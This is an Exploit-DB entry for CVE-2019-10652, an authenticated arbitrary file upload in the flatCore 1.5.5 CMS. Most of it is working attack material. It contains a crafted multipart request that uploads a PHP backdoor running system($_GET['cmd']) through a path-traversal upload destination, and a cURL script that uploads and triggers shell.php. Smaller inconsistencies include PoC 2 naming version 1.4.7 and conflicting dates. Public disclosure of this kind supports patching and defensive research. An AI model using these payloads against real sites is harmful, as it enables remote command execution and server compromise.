flatCore 1.5.5 - Arbitrary File Upload

EDB-ID:

52165

CVE:

2019-10652

EDB Verified:

Author:

CodeSecLab

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2025-04-10

Vulnerable App: 
# Exploit Title: flatCore 1.5.5 - Arbitrary File Upload
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: 1.5.5
# Tested on: Ubuntu Windows
# CVE : CVE-2019-10652
PoC:
1)
1. Access the flatCore Admin Panel
URL: http://flatcore/acp/acp.php
Log in with valid administrative credentials.
2. Upload a Malicious PHP File
Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
3. Intercept and Modify the Upload Request
Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:

POST /acp/core/files.upload-script.php HTTP/1.1
Host: flatcore
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: <calculated length>
Cookie: PHPSESSID=<valid_session_id>

-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/octet-stream

<?php
// Simple PHP backdoor code
echo "Vulnerable File Upload - PoC";
system($_GET['cmd']);
?>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="upload_destination"

../content/files
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="csrf_token"

<valid_csrf_token>
-----------------------------735323031399963166993862150
Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
4. Verification
After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami

PoC 
2)
# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
# Target URL: http://flatcore/
# The attacker must be authenticated as an administrator to exploit this vulnerability

# Step 1: Log in as an administrator and obtain the CSRF token
# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.

# Step 2: Upload a malicious PHP file using the file upload feature

# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
echo "<?php phpinfo(); ?>" > shell.php

# Upload the PHP file using cURL
curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
    -H "Content-Type: multipart/form-data" \
    -F "file=@shell.php" \
    -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
    -F "upload_destination=../content/files" \
    -F "file_mode=overwrite" \
    -b "PHPSESSID=YOUR_SESSION_ID_HERE"

# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID

# Step 3: Access the uploaded malicious PHP file
echo "Visit the following URL to execute the uploaded PHP file:"
echo "http://flatcore/content/files/shell.php"

This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
[Replace Your Domain Name]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services